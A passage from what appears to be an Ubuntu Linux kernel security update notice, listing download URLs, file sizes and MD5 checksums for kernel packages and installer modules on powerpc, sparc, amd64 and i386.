\r\nhttp://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 1649222 4bb31c23d481a7043a9b8b7bbc2b97a1\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 1576420 bae2f8e351ef2583d896db43d605bab2\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 78246 ccc4535e189dccf82c221fe5e599e414\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 83500 4e8c6267a217a3db12c2828eca6756ff\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 17462 7d72e38a07af9206a15e4697d189a7c5\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 18522 a07658db715e2458a4dc8b9932aa3ddf\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 68010 e7eff09198869bc8be1d474ca77bf589\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 80402 65129387dd13b5e66ac65ea2dc59b4b1\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 152194 de9304b41dfc7de479457399a2564df1\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 159724 a6b53656dc11d49003c3746ce716fac1\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 22518 4c59b8b22c1d07f9a4dc165452a310b8\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 25788 e3c04bec55fafe0689bf4cf35131603f\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 146476 8b6e5e0d50438fc619fda0a261691e37\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 71448 516414f98e8a0206648da9084db6112c\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 47608 962ea23e980527f2ff1b2a78358d5a31\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 98040 535fbb7c81f2e66764b1a3946a806495\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 591776 f3bbcc5b903a29399029494b3cb36c26\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 151672 e05776bb99ffccad537ed011762f85f7\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 99370 3cfd984ddb2afdde66f81cd5c9d94c93\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 3235260 f824b31c467ae8540b119dd1eaa7cbea\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-28-sparc64-smp_2.6.32-28.55_sparc.deb\r\n Size/MD5: 686974 f15d7fdf179adbf0c7040416d16d7023\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-28-sparc64_2.6.32-28.55_sparc.deb\r\n Size/MD5: 685822 b6245df7c3a8ef0d1ed2225a84f96394\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-28-sparc64-smp_2.6.32-28.55_sparc.deb\r\n Size/MD5: 22692350 a842e5acc65c67f44a7c16a507c08946\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-28-sparc64_2.6.32-28.55_sparc.deb\r\n Size/MD5: 22232324 2bfec27fe83350aa112db843194ff091\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.32-28.55_sparc.deb\r\n Size/MD5: 805736 b71e2b4132c1580da1b9a4de2f1a3b67\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-28_2.6.32-28.55_sparc.deb\r\n Size/MD5: 232786 5d7a4e6b721b26243f6cd8e1375223b0\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 234870 9eb6a09780e38b72d8e1a8e06887ce01\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 215162 d9aefb4204543b027f911728c34035f5\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 31902 1d99ad8b6d9988a3c5c2928bbecf4f57\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 337276 f353b17f563574a5cd66d0e74469b625\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 1812762 d7888abdfaba1f78ee53bff09c83d52c\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 247296 a1fa5f7172178bf921e8f6efc6071901\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 140172 c876df53300d1d64d247daa68e22714a\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 39954 4bce54b8a48a6fc74cb4e43c625227ff\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 207162 82901639c6e383b9e0300654bde5e226\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 9182 0e34fd322f328cf0d9dcb4eafd144cfa\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 64472 705e42ebb94bf8a6844b737caa9fabc2\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 213360 c2e04c96f8d789dc85658f202348bd79\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 1304788 a6ac22f9ae3980789cb3751dbebc0dfa\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 96628 9c61da9973d25f77c9bb55e8a707ac86\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 17706 0b9a0ea76090d5cd468e73a5f87f29da\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 208396 c702b360697d79371997274762fc3cee\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 193384 da5904407230ba583ac24e9bfc59ef7f\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-28-sparc64-di_2.6.32-28.55_sparc.udeb\r\n Size/MD5: 27198 80156933d4e4bd242196e0e7a61996cc\r\n\r\nUpdated packages for Ubuntu 10.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.35-25.44.diff.gz\r\n Size/MD5: 3718650 1c5262e3416693473677f033ca388706\r\n http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.35-25.44.dsc\r\n Size/MD5: 6539 4a134aa711518dfc655e1fbbcfe60743\r\n http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.35.orig.tar.gz\r\n Size/MD5: 88300782 62001687bd94d1c0dd9a3654c64257d6\r\n\r\n Architecture independent packages:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.35-25.44_all.deb\r\n Size/MD5: 6680698 0de88b1de4a06c398be5340aae61e9cb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.35-25_2.6.35-25.44_all.deb\r\n Size/MD5: 10323478 adc44ee8e923ffa9be850b8620c838cb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.35_2.6.35-25.44_all.deb\r\n Size/MD5: 72444300 21e32945f089aead209863c720a770cd\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-common_2.6.35-25.44_all.deb\r\n Size/MD5: 102024 d30e2c959f0dd7b43a1a5bcd490213fb\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 236840 cd47499ba4caa7d229a15fa586a1cd9e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 9516 1b51afefe16550a1287dbbca9d804602\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 18146 c5facd2399bfbbfae22f977c030cd5d7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 50084 1d9f464d4377f081e61ba1b93b50e265\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 50088 891d618c3927b54dd9092a438217a66c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 46866 de1ac3e361af1398e0512ec0045894eb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 42980 656acba4f949fbd1dec5ba62238d2952\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 15128 a4402d2903c68b687d1df137204eb5f0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 15124 4dbdfeca9b2ef67cab6ddb05aa98b9c5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 95796 fcf3dcc9b315cf0ebaa64fcd593beaeb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 39394 fbd0bca3a9774af6a7d69e701ba015e1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 39302 e468f09cc345ce01f5bd742d4908100c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 599984 122659e77eb65437db4e9b731d0874bc\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 354332 29b4d7f94f474602b3f13167688901b0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 406362 011364ed716380be9c8e2092ea006488\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 272164 0a1c643e42689fa3a432e31f9921daa3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 103080 e800ffc5f8ac283415b022783d7f401f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 319794 32a07978e61a34343a39ded452d96fe7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 170880 cd8a7d5ced417c140a6b7e6537b89eaa\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 4789750 d8f88dd0d89609eaf278d51f88cdf2c5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 4860814 a6772b70434698c4e5f4a49a255ca2d9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.35-25-generic_2.6.35-25.44_amd64.deb\r\n Size/MD5: 806506 fb40b5fc4e44548c49e282da0dbf88bc\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.35-25-server_2.6.35-25.44_amd64.deb\r\n Size/MD5: 806964 fc181e020b60a5e5c2c0b096585fc0a8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.35-25-virtual_2.6.35-25.44_amd64.deb\r\n Size/MD5: 808212 e3055783c0d06cde52cf9799d943bf6b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.35-25-generic_2.6.35-25.44_amd64.deb\r\n Size/MD5: 33982302 75dbf5fa8147fe00d4639f72d21b6602\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.35-25-server_2.6.35-25.44_amd64.deb\r\n Size/MD5: 33911890 29267cca820959829dd444ca00ebe89a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.35-25-virtual_2.6.35-25.44_amd64.deb\r\n Size/MD5: 10768818 2501645566cc5b9779019f7906d2ba0e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.35-1025.44_amd64.deb\r\n Size/MD5: 811988 c65a01c9c62d09688a01e10c205e2766\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.35-25_2.6.35-25.44_amd64.deb\r\n Size/MD5: 263320 eb3cdb2067324643cb4877b37878ad86\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 180458 95f98b28e3437528fd92de8b8ceefe48\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 180412 64f27e49be922c3436ca8fd818ad30b6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 277904 b71150f18d1549493626cc0999e04ec9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 148782 315bb06e62b97648e6c1aed868121cc7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 33748 fce387c249ab0c54b2de7a304a84d2ea\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 33744 beda5a09d17ca3d505293094ba4cfda2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 367494 32b2641a584d2ba368c407cd45b2c1ab\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 2478222 d533f4cefa9bd2d1df37139fc46a741f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 799228 48626a7811d1ab2464f6c2608fc7a143\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 134954 d7f28d3e1c50f7156c77434daa20c073\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 270708 2b606db9baf4dbfa388517b173d81fa8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 249508 c4ba32a879b4075a721b589e226b54e4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 266040 a2ab51afde17c85cd9e1947e7c2b2213\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 39256 b870ccd8db9c3d8068b3f988f06efb24\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 39220 cb0181f2e41410774743e62154fe62c4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 151192 255022d19b12322b27ea38cdf5d4ed4e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 67786 d941f0c05e4b328170de392822d3ad5f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 22268 35875c9d2bd3fadaf7f58ba483484dd6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 9688 f0b0f0ef0e45ba03277659d7ae1f8675\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 40916 960c7ae38047eea51a9b560e00dc1398\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 40648 b9ef8a12b046cea90d02733944d5aced\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 112052 deedc2199ce6e9b1a137364e326acdf2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 11126 9719df79842be39b179339d82230ad11\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 1590620 83c7162b968f44fd1d350299bf7cf32e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 248946 9b7cb9f42c06ae425b7e5a557e5cdb01\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 40468 f7b369d5895512757617483252edd3ef\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 18196 f3b7cf160fb433da5f47c2fc99d342ce\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 18168 0966d6cd74f8e3569a78de9aa0ce4e3a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 54038 5a2871e0a9d47a813ba1fac70cc74d76\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 53948 ec97c6e8a938ffd56a007cacd6842b35\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 129228 25dcd82334d93935cdbdd7ea93d3a666\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 17850 90b69fb10acbed5c2c384d6ff9790ce2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 5044 af8b65872dfaca59289f83add75c38ae\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.35-25-generic-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 23024 7380ccecd5aa2abdb51a1e2faead8fe9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.35-25-virtual-di_2.6.35-25.44_amd64.udeb\r\n Size/MD5: 23004 3c73194166fb65a953d8f988aa9cdf8b\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 211584 354b13371ad5d9f75155ea3caec7c4fb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 218012 dfbbcbebd638bf4f42afddd373618680\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 8916 2beaedd58647b90a2d55ab7193fdcd6e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 36018 c47e5e262932adc0de893057c2ae823f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 36306 fc74770ba662aab1335c1df3906a8b47\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 48154 1aa391a539dc6d523e7d045e596ba7ed\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 48168 74201d57ea230d506280287845a9a841\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 48166 c1ac65d18828adda16f5410aa5514843\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 44304 60f0a10d5139d914f1cf162c98bb34bd\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 44322 c00d2c8c5e7031960ae0a8d994589b07\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 40918 e84a760793d476d20605aadf0f463fb8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 14142 c1eb2d6496b58095a473108b84364973\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 14154 3007ca35ba65762b980326eca8e66de4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 14150 fc2607a994f66ea8950e3a47cc9d8d92\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 90428 d201c275052185f17ecc101f2c295071\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 90776 97f2dab5fa44d4494b616a623a6ce843\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 35194 0949280713d76d4d930cbec5198393f8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 35254 c5303a9b303e0b2dbda211d16c8c7e86\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.35-25-virtual-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 35246 464d61d96715c8f250130a59a5515ad8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.35-25-generic-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 589908 c2b084b38271a28fe29bad1a9438d1b7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.35-25-generic-pae-di_2.6.35-25.44_i386.udeb\r\n Size/MD5: 589982 c08084f7c972869766e813ec1dd285e9\r\n 